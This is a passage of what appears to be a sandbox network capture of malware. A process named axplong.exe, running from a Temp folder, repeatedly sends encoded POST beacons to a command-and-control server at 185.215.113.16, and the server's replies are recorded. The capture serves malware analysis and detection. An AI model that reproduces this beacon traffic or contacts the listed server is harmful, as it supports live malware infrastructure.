Sep 27, 2024 07:02:39.705188990 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:39.941068888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49745	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:40.059350967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:40.766402006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:40.767956018 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:40.997365952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49746	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:41.105438948 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:41.825607061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:41.826558113 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:42.064119101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49747	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:42.183870077 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:42.916074991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:42.916912079 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:43.153337955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49748	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:43.277520895 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:43.987272978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:43.989324093 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:44.216675997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49749	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:44.324258089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:45.019737005 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:45.020591021 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:45.243815899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49750	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:45.355938911 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:46.054280043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:46.055527925 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:46.279892921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49751	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:46.390621901 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:47.092670918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:47.105245113 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:47.335144043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49752	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:47.499707937 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:48.217191935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:48.218188047 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:48.450290918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49753	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:48.558999062 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:49.262137890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:49.264215946 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:49.494240999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49754	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:49.606859922 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:50.334351063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:50.342921019 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:50.576261044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49755	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:50.693644047 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:51.387696028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:51.388864040 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:51.612202883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49756	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:51.730860949 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:52.454442024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:52.455782890 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
